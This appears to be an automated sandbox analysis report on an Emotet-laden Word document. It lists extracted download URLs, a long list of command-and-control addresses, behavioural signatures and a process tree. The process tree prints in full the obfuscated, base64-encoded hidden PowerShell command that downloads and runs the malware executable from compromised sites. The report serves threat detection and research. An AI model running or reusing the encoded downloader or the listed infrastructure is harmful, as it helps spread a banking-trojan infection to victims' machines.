Analysis
-
max time kernel
28s -
resource
win10v191014 -
submitted
16-12-2019 11:16
General
Malware Config
Extracted
https://toivn.com/wp-admin/583483/
http://talkmeupdev.us-west-2.elasticbeanstalk.com/wp-admin/network/k96246/
https://thienvuongphat.com/thp/iy99/
http://campsparrowhawk.se/wp-admin/j3q81823/
http://doisongvaconnguoi.com/war1wqcr/narqdcn7/
Extracted
emotet
152.170.108.99:443
99.252.27.6:80
93.148.252.90:80
96.126.121.64:443
104.236.137.72:8080
85.234.143.94:8080
80.85.87.122:8080
2.139.158.136:443
80.11.158.65:8080
79.31.85.103:80
77.55.211.77:8080
96.61.113.203:80
181.198.203.45:443
142.93.114.137:8080
186.15.83.52:8080
181.36.42.205:443
68.183.190.199:8080
159.203.204.126:8080
50.28.51.143:8080
46.101.212.195:8080
188.216.24.204:80
118.36.70.245:80
185.160.212.3:80
190.146.131.105:8080
37.120.185.153:443
91.205.215.57:7080
76.221.133.146:80
139.5.237.27:443
83.165.163.225:80
73.60.8.210:80
93.67.154.252:443
96.38.234.10:80
24.100.130.206:80
109.169.86.13:8080
186.68.48.204:443
82.36.103.14:80
139.162.118.88:8080
200.119.11.118:443
223.255.148.134:80
2.44.167.52:80
91.83.93.124:7080
207.154.204.40:8080
51.255.165.160:8080
97.81.12.153:80
69.163.33.84:8080
68.174.15.223:80
190.186.164.23:80
82.196.15.205:8080
63.246.252.234:80
200.123.101.90:80
138.68.106.4:7080
188.14.39.65:443
119.59.124.163:8080
181.231.62.54:80
217.199.160.224:8080
163.172.40.218:7080
149.62.173.247:8080
203.130.0.69:80
212.71.237.140:8080
46.28.111.142:7080
191.103.76.34:443
204.63.252.182:443
85.152.208.146:80
91.74.175.46:80
91.204.163.19:8090
68.129.203.162:443
91.117.83.59:80
149.135.123.65:80
113.61.76.239:80
200.58.83.179:80
118.200.218.193:443
130.45.45.31:80
190.38.14.52:80
87.106.77.40:7080
142.127.57.63:8080
45.79.95.107:443
183.99.239.141:80
5.32.41.106:80
201.213.32.59:80
62.75.160.178:8080
5.196.35.138:7080
172.90.70.168:8080
192.241.146.84:8080
37.183.121.32:80
86.42.166.147:80
184.184.202.167:443
94.200.114.162:80
190.97.30.167:990
219.75.66.103:80
190.210.184.138:995
181.61.143.177:80
181.135.153.203:443
111.125.71.22:8080
45.50.177.164:80
185.86.148.222:8080
125.99.61.162:7080
116.48.148.32:80
71.76.45.83:443
68.183.170.114:8080
14.160.93.230:80
72.29.55.174:80
62.75.143.100:7080
104.131.58.132:8080
190.195.129.227:8090
2.42.173.240:80
79.7.114.1:80
58.171.181.213:80
178.79.163.131:8080
109.166.89.91:80
203.25.159.3:8080
116.48.138.115:80
200.124.225.32:80
74.59.187.94:80
112.218.134.227:80
82.8.232.51:80
5.88.27.67:8080
144.139.56.105:80
104.33.129.244:80
73.167.135.180:80
87.106.46.107:8080
212.237.50.61:8080
Signatures
-
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 4936 WINWORD.EXE 4364 549.exe 4332 549.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 4936 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 4644 Powershell.exe -
Executes dropped EXE 2 IoCs
pid Process 4364 549.exe 4332 549.exe -
Suspicious behavior: EmotetMutantsSpam 1 IoCs
pid Process 4332 549.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 4936 WINWORD.EXE -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 4400 wrote to memory of 4504 4400 SppExtComObj.exe 76 PID 4644 wrote to memory of 4364 4644 Powershell.exe 80 PID 4364 wrote to memory of 4332 4364 549.exe 81 -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4644 Powershell.exe -
Checks system information in the registry 2 TTPs 2 IoCs
System information is often read in order to detect sandboxing environments.
description ioc Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\5f2fa8f31561486dd05cc43c19240d180891d098fe1891d8df3606b544feabea.doc" /o ""1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of FindShellTrayWindow
- Suspicious behavior: AddClipboardFormatListener
PID:4936
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵
- Suspicious use of WriteProcessMemory
PID:4400 -
C:\Windows\System32\SLUI.exe"C:\Windows\System32\SLUI.exe" RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=TimerEvent2⤵PID:4504
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exePowershell -w hidden -en JABFAHUAYQB6AGMAcgBvAHYAeABvAHMAPQAnAFgAaABtAGwAegBiAGIAdQB3AGoAegBjAGoAJwA7ACQAQQBwAHoAegBzAG4AeQBrAHcAcAB3AGwAIAA9ACAAJwA1ADQAOQAnADsAJABDAGMAawBjAHQAcQB5AHAAegBsAGIAPQAnAFMAawBoAGcAcQBhAGMAawBkACcAOwAkAE0AYwBsAHMAeQB2AHoAagB1AHQAcQB6AG4APQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEEAcAB6AHoAcwBuAHkAawB3AHAAdwBsACsAJwAuAGUAeABlACcAOwAkAFcAdgBoAGwAYQB4AHMAZAB3AGcAPQAnAEkAagBkAGgAaQB3AG0AbwBhAHcAJwA7ACQASgBnAHMAbABxAGQAegB1AD0AJgAoACcAbgBlAHcAJwArACcALQBvAGIAJwArACcAagAnACsAJwBlAGMAdAAnACkAIABOAEUAdAAuAHcARQBiAEMAbABJAGUAbgB0ADsAJABSAGcAcABuAG8AbABnAHMAPQAnAGgAdAB0AHAAcwA6AC8ALwB0AG8AaQB2AG4ALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvADUAOAAzADQAOAAzAC8AKgBoAHQAdABwADoALwAvAHQAYQBsAGsAbQBlAHUAcABkAGUAdgAuAHUAcwAtAHcAZQBzAHQALQAyAC4AZQBsAGEAcwB0AGkAYwBiAGUAYQBuAHMAdABhAGwAawAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AbgBlAHQAdwBvAHIAawAvAGsAOQA2ADIANAA2AC8AKgBoAHQAdABwAHMAOgAvAC8AdABoAGkAZQBuAHYAdQBvAG4AZwBwAGgAYQB0AC4AYwBvAG0ALwB0AGgAcAAvAGkAeQA5ADkALwAqAGgAdAB0AHAAOgAvAC8AYwBhAG0AcABzAHAAYQByAHIAbwB3AGgAYQB3AGsALgBzAGUALwB3AHAALQBhAGQAbQBpAG4ALwBqADMAcQA4ADEAOAAyADMALwAqAGgAdAB0AHAAOgAvAC8AZABvAGkAcwBvAG4AZwB2AGEAYwBvAG4AbgBnAHUAbwBpAC4AYwBvAG0ALwB3AGEAcgAxAHcAcQBjAHIALwBuAGEAcgBxAGQAYwBuADcALwAnAC4AIgBzAHAATABgAGkAVAAiACgAJwAqACcAKQA7ACQAWQBzAHYAdABuAHAAZQB6AD0AJwBGAHgAaQBuAHAAYwBzAHkAJwA7AGYAbwByAGUAYQBjAGgAKAAkAEwAbQB2AHUAdQBtAGkAegAgAGkAbgAgACQAUgBnAHAAbgBvAGwAZwBzACkAewB0AHIAeQB7ACQASgBnAHMAbABxAGQAegB1AC4AIgBkAGAATwBXAG4ATABgAG8AYQBkAGYAYABpAEwARQAiACgAJABMAG0AdgB1AHUAbQBpAHoALAAgACQATQBjAGwAcwB5AHYAegBqAHUAdABxAHoAbgApADsAJABYAHkAeQB4AG0AdAB1AG4AcgBpAGoAYQBnAD0AJwBJAGIAegBwAGcAYgB2AGcAZwBkACcAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQBJAHQAJwArACcAZQBtACcAKQAgACQATQBjAGwAcwB5AHYAegBqAHUAdABxAHoAbgApAC4AIgBsAGUAbgBnAGAAVABoACIAIAAtAGcAZQAgADIANAA1ADUANAApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBzAFQAYABBAFIAVAAiACgAJABNAGMAbABzAHkAdgB6AGoAdQB0AHEAegBuACkAOwAkAEgAagB3AGIAbgBwAGcAegB0AHkAZwB1AD0AJwBJAHgAcwBmAHEAZQBhAGgAYQB0AGkAJwA7AGIAcgBlAGEAawA7ACQAQwBzAHIAdABnAHQAeQBnAGgAbQBoAG0AcQA9ACcATwBkAHMAdgBsAGsAbgBqAG8AeABwACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFoAaQBjAHMAbABzAGQAaABiAGUAYQBhAD0AJwBBAGsAawB0AHoAaABuAHQAeABiACcA1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
PID:4644 -
C:\Users\Admin\549.exe"C:\Users\Admin\549.exe"2⤵
- Suspicious use of SetWindowsHookEx
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4364 -
C:\Users\Admin\549.exe--33dd4183⤵
- Suspicious use of SetWindowsHookEx
- Executes dropped EXE
- Suspicious behavior: EmotetMutantsSpam
PID:4332
-
-